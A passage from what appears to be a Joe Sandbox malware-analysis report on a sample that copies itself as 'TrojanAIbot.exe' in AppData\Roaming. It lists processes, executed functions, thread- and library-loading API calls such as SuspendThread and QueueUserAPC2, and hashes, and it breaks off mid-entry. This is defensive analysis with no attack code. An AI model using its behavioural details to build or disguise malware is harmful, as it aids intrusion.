Imagebase:	0xa30000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:01:32
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:01:36
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	350F873C39FAF143D500811678A86FC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	10:01:37
Start date:	10/01/2025
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'356'800 bytes
MD5 hash:	1ACA52915DC5A84234E34BB426FEF8DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:01:40
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0xae0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.2%
Total number of Nodes:	1015
Total number of Limit Nodes:	49

Executed Functions

Function 00007FF6C7501460 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C750146F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014AD
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014D9
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014EA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014F9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C7501590
GetProcessAffinityMask.KERNEL32 ref: 00007FF6C75015A3

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
Instruction ID: 461fc34510deafb1e12830f4ddc6906324ae4b0858ad16087914df31e5f43b26
Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
Instruction Fuzzy Hash: 8D515071A187868AEE508F1AE84417967A1FB447CAF844036D9CECB765EF7CE448DB01

Function 00007FF6C751D16A Relevance: 9.5, APIs: 4, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF6C751D1B8

Strings

END, xrefs: 00007FF6C751D73A

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: BreakDebug
String ID: END
API String ID: 456121617-2522575163
Opcode ID: fd0cfc299c93373dccf67302107f340d7b25be9fc4c9faadf42bafee91cba5e2
Instruction ID: 2ff7bbd49726d37a2bdf9cba4c38b6ecdcc0d1f7b379cb0184b7bc6c191c3c83
Opcode Fuzzy Hash: fd0cfc299c93373dccf67302107f340d7b25be9fc4c9faadf42bafee91cba5e2
Instruction Fuzzy Hash: 02827871E09B4686FE558F2AA85127833A4BF45B9BF944236D9DDC23A0DF3CE881D700

Function 00007FF6C7518830 Relevance: 3.5, APIs: 2, Instructions: 952COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6C75189EC
LeaveCriticalSection.KERNEL32 ref: 00007FF6C7518A03

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: f3fd143304c35d323275af461a62ea9e382ad9bd868c1aad206732aa8e2a24a2
Instruction ID: af5998e00798b7a096a3d39feb026656c148dc4a29946bd40af8bc21ab1a2e66
Opcode Fuzzy Hash: f3fd143304c35d323275af461a62ea9e382ad9bd868c1aad206732aa8e2a24a2
Instruction Fuzzy Hash: 9CB26A72A09B8686EF508F16E88127933E4FB49BA6F544A35DACC97764DF3CE491D300

Function 00007FF6C7509340 Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

Creation of WaitForGCEvent failed, xrefs: 00007FF6C75096C1
TraceGC is not turned on, xrefs: 00007FF6C7509346

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
API String ID: 133006248-518909315
Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
Instruction ID: c6d3e6e76d661f91002b358b0855cc566c738ce004a21454df7ebace2c52ca6d
Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
Instruction Fuzzy Hash: 05B1BF71E0DB8282FE15DF26A4422796695AF857CAF844135E5CEC77AADF3CF0419700

Function 00007FF6C7588FB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 00007FF6C7589026

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
Instruction ID: 5128b225254d3644dcae90dbcd313564aeaa821db797c8a68c82342e3ff15d33
Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
Instruction Fuzzy Hash: 6B21C033A19A91DADB24DF61E8105E93BA0FB48399F904136FE8EC3A49DF38D581C340

Function 00007FF6C7518200 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f766c000576d368ca18f94765b734f1fd99b89ba07df8c571fbdde3c95628d64
Instruction ID: c57ce88b65f94a44df7b89cf207e5b2c40c17b7bf3e12212982170b5088968de
Opcode Fuzzy Hash: f766c000576d368ca18f94765b734f1fd99b89ba07df8c571fbdde3c95628d64
Instruction Fuzzy Hash: 15F1F621E19B4D42E9228F3755013F596816F6A7D6F5CCB32E98DB6BA0EF3DF0819600

Function 00007FF6C7522370 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: c15869ed2daca5425862b827851f09c6ebb8be453a4a231482a219a0bcdb90c0
Instruction ID: 4342c246cabdf57fc2d7b38b1ea470e6278dc714ed8618513c60709a419c489c
Opcode Fuzzy Hash: c15869ed2daca5425862b827851f09c6ebb8be453a4a231482a219a0bcdb90c0
Instruction Fuzzy Hash: 42029275E0C64686FE158F2AA85523827E5AF457C6F9AC636D5CED3260DF3CB480EA00

Function 00007FF6C7520C50 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21242118c0c725f138a68b1e426c1c509df344324749b6073c2f5fb4b5632b7
Instruction ID: 01cbb1936c48765e90d90ecf6aa8bf7ff3826e39ab150e4b6cdd99d1ee91625c
Opcode Fuzzy Hash: e21242118c0c725f138a68b1e426c1c509df344324749b6073c2f5fb4b5632b7
Instruction Fuzzy Hash: 00F19F20D1CB8385FE45DF36E9512B567E1AF953C6F549336E8CEE12A2EF2C7490A600

Function 00007FF6C751C9B6 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

BEGIN, xrefs: 00007FF6C751CC04
m, xrefs: 00007FF6C751CA3E
condemned generation num: %d, xrefs: 00007FF6C751CB11
qX, xrefs: 00007FF6C751CAFA
.NET BGC, xrefs: 00007FF6C751CCC6

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID:
String ID: .NET BGC$BEGIN$condemned generation num: %d$m$qX
API String ID: 0-2393834873
Opcode ID: 33b3548883385eafe5b174556ad28cdbfcf7c3b81620c79b2ed6c5fd338ee617
Instruction ID: df92164bfb9326d86ddc7502495f8a52525adf58b1143d969e2253edcb5fb9ef
Opcode Fuzzy Hash: 33b3548883385eafe5b174556ad28cdbfcf7c3b81620c79b2ed6c5fd338ee617
Instruction Fuzzy Hash: D0226E61D0CA8686FA518F2AE8412B463A4FF5478BF455235DACDE6262EF3DF481E700

Function 00007FF6C7501010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6C750105B
IsProcessInJob.KERNEL32 ref: 00007FF6C750106B
QueryInformationJobObject.KERNEL32 ref: 00007FF6C750109B
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6C7501104
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF6C7501143
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF6C750118C

Strings

@, xrefs: 00007FF6C75010EC
@, xrefs: 00007FF6C7501181
@, xrefs: 00007FF6C7501138

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
Instruction ID: d2bc3ab888f14c9b47ced7123770a551e9c104272c7edef621c0b54a925eaf8d
Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
Instruction Fuzzy Hash: EE4164317086D186EB758F12E5543AAB7A0FB48BD5F844236DADE87B88CF3CD4458B41

Function 00007FF6C74F4E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83
threadlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF6C74FB731
GetProcAddress.KERNEL32 ref: 00007FF6C74FB741
GetLastError.KERNEL32 ref: 00007FF6C74FB794
SuspendThread.KERNELBASE ref: 00007FF6C74FB7AD
GetThreadContext.KERNEL32 ref: 00007FF6C74FB7C8
ResumeThread.KERNELBASE ref: 00007FF6C74FB7F2

Strings

kernel32, xrefs: 00007FF6C74FB724
QueueUserAPC2, xrefs: 00007FF6C74FB73A

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
String ID: QueueUserAPC2$kernel32
API String ID: 3714266957-4022151419
Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
Instruction ID: 9f8c658d26e2f86681f6f33b6e5740c417c7b6b06d82cb53b7a164dbb5aa01a3
Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
Instruction Fuzzy Hash: 1F31A320A08A4281FE549F2AE8443796391FF46BE6F548231D8EDC6BE4DF2CE445D700

Function 00007FF6C7512770 Relevance: 9.1, APIs: 6, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6C75127B7
LeaveCriticalSection.KERNEL32 ref: 00007FF6C75127CF
SwitchToThread.KERNEL32 ref: 00007FF6C751288C
SwitchToThread.KERNEL32 ref: 00007FF6C7512895
SwitchToThread.KERNEL32 ref: 00007FF6C75128BF
LeaveCriticalSection.KERNEL32 ref: 00007FF6C7512963

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: CriticalSectionSwitchThread$Leave$Enter
String ID:
API String ID: 1765607624-0
Opcode ID: 14683ec19611637db49a90d7dcfcbec7fbdc19b2c3b1af96a848b77379b50574
Instruction ID: 32b7c63f8312103b8eed566ab8035ebe451cb1a62433581f66fef2c64605d2ee
Opcode Fuzzy Hash: 14683ec19611637db49a90d7dcfcbec7fbdc19b2c3b1af96a848b77379b50574
Instruction Fuzzy Hash: 6F518E30E0C60387FA519F2AAC4117932A5BF41797F948635E5EDC26E2CE2CF881EB41

Function 00007FF6C74FB820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C74F474F,?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C74FB82B

Part of subcall function 00007FF6C7501460: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C750146F
Part of subcall function 00007FF6C7501460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014AD
Part of subcall function 00007FF6C7501460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014D9
Part of subcall function 00007FF6C7501460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014EA
Part of subcall function 00007FF6C7501460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C74FB84A), ref: 00007FF6C75014F9

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C74F474F,?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C74FB89D
GetProcessAffinityMask.KERNEL32 ref: 00007FF6C74FB8B0
QueryInformationJobObject.KERNEL32 ref: 00007FF6C74FB8FE

Strings

PROCESSOR_COUNT, xrefs: 00007FF6C74FB866

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
String ID: PROCESSOR_COUNT
API String ID: 1701933505-4048346908
Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
Instruction ID: 608d57f2cebec0fb234040e757f587f18367771229a30bb1db72b74e076add58
Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
Instruction Fuzzy Hash: 0D316131A0CA4386EF549F61D8903BD63A1EF8679AF448036D6CEC7695DF2CE509D740

Function 00007FF6C74F4740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6C74FB820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C74F474F,?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C74FB82B
Part of subcall function 00007FF6C74FB820: QueryInformationJobObject.KERNEL32 ref: 00007FF6C74FB8FE

Part of subcall function 00007FF6C74FB6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF6C74F4778,?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C74FB6D1

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF6C74F1EA0), ref: 00007FF6C74F48BE

Strings

StressLogLevel, xrefs: 00007FF6C74F4830
TotalStressLogSize, xrefs: 00007FF6C74F47F5
The required instruction sets are not supported by the current CPU., xrefs: 00007FF6C74F48AA

Memory Dump Source

Source File: 00000000.00000002.1958671394.00007FF6C74F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C74F0000, based on PE: true

Associated: 00000000.00000002.1958220845.00007FF6C74F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959860902.00007FF6C75D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1959986409.00007FF6C760A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7671000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960285211.00007FF6C7677000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1960344370.00007FF6C767F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6c74f0000_RJKUWSGxej.jbxd

Similarity

API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
API String ID: 3403879507-2841289747
Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
Instruction ID: 70f03626bdde9fa9e2460c2d2eece781470c6961f8f858701e53176d03ae1d8d
Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
Instruction Fuzzy Hash: C7418036E0868385FA40AF65E8026B96791AF41B86F44C031E9DDD76D7CF2CF546D701

Function 00007FF6C74F54E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

